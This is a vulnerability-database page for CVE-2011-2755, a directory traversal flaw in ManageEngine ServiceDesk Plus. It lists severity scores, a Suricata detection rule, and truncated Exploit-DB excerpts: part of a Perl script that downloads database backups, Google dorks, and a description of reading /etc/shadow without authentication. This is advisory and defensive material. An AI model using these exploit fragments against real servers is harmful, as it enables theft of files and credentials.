CVE-2011-2755
published 2011-07-17CVE-2011-2755: Directory traversal vulnerability in FileDownload.jsp in ManageEngine ServiceDesk Plus 8.0 before Build 8012 allows remote attackers to read arbitrary files…
PriorityP346medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
30.88%
98.0th percentile
Directory traversal vulnerability in FileDownload.jsp in ManageEngine ServiceDesk Plus 8.0 before Build 8012 allows remote attackers to read arbitrary files via unspecified vectors.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| manageengine | servicedesk_plus | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS ManageEngine ServiceDesk Plus Arbitrary File Access via Parameter Traversal (CVE-2011-2755)
suricata·2025-12-15·CVSS 5.0
CVE-2011-2755 [MEDIUM] ET WEB_SPECIFIC_APPS ManageEngine ServiceDesk Plus Arbitrary File Access via Parameter Traversal (CVE-2011-2755)
ET WEB_SPECIFIC_APPS ManageEngine ServiceDesk Plus Arbitrary File Access via Parameter Traversal (CVE-2011-2755)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ManageEngine ServiceDesk Plus Arbitrary File Access via Parameter Traversal (CVE-2011-2755)"; flow:established,to_server; http.uri; content:"/workorder/FileDownload.jsp|3f|"; fast_pattern; startswith; content:"module|3d|agent"; content:"FILENAME|3d|"; pcre:"/^[^&]*?(?:(?:\x2e|%(?:25)?2[Ee]){1,2}(?:\x2f|\x5c|%(?:25)?5[Cc]|%(?:25)?2[Ff]){1,}){2,}/R"; reference:url,www.exploit-db.com/exploits/17437; reference:cve,2011-2755; classtype:web-application-attack; sid:2066333; rev:1; metadata:affected_product Zoho_ManageEngine, attack_target Server, tls_state TLSDecrypt, created_at 2025_12_15, cve CVE_2011_2755, deploym
Exploit-DB
ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure
exploitdb·2011-07-07
CVE-2011-2757 ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure
ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure
---
# Exploit Title: ManageEngine ServiceDesk new();
$url="http://127.0.0.1";
$path="/workorder/FileDownload.jsp";
$installPath=&getInstallPathWin($url,$path);
if ($installPath ne "") {
@backups=&getServerOutLogs($url,$path,$installPath);
} else {
print "Install path not found :(\n";
exit();
}
if (scalar(@backups)>0) {
print "hehe.. We got paths to backup files..\n If they are
on the same drive and exists - we will own their world!!\n";
foreach $backLine (@backups) {
@backInfo=split(/ --- /,$backLine);
#print "Trying to download $backInfo[1] from
$backInfo[0]...\n";
&downloadBackups($url,$path,$backLine);
}
}
unlink("bad");
print "Dude, check out \'db_backups.html\'\n";
sub downloadBackups {
my ($url,$path
Exploit-DB
ManageEngine ServiceDesk Plus 8.0 - Directory Traversal
exploitdb·2011-06-23
CVE-2011-2757 ManageEngine ServiceDesk Plus 8.0 - Directory Traversal
ManageEngine ServiceDesk Plus 8.0 - Directory Traversal
---
Google Dork: ie: intitle:ManageEngine ServiceDesk Plus"
Author: Keith Lee ([email protected]), @keith55,
http://milo2012.wordpress.com
Software Link: http://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus.exe
Version: 8.0
Description:
Directory traversal vulnerabilities has been found in ManageEngine
ServiceDesk Plus 8.0 a web
based helpdesk system written in Java.
The vulnerability can be exploited to access local files by entering
special characters in variables used to create file paths. The attackers
use �../� sequences to move up to root directory, thus permitting
navigation through the file system.
Request:
GET http://[webserver
IP]:8080/workorder/FileDownload.jsp?module=agent&&F
Exploit-DB
ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal
exploitdb·2011-06-23
CVE-2011-2757 ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal
ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal
---
Advisory:
ManageEngine Support Center Plus 7.8 build 0x90.nl
Software link:
http://www.manageengine.com/products/support-center/download.html
Tested on:
Linux & Windows
Category:
Directory Traversal
Severity:
High
Google Dork: intitle:ManageEngine SupportCenter Plus
Description:
It's possible to access all local files on the server and because Support Center Plus runs as root/Administrator by default it's possible to access files owned by superusers too.
This for example makes it possible to grab for the "/etc/shadow" file on a linux box.
An authenticated user on the helpdesk is not needed, so any attacker can exploit this vulnerability without credentials.
Requests Linux:
Grab the /etc/passwd & /etc/shado
No writeups or analysis indexed.
2011-07-17
Published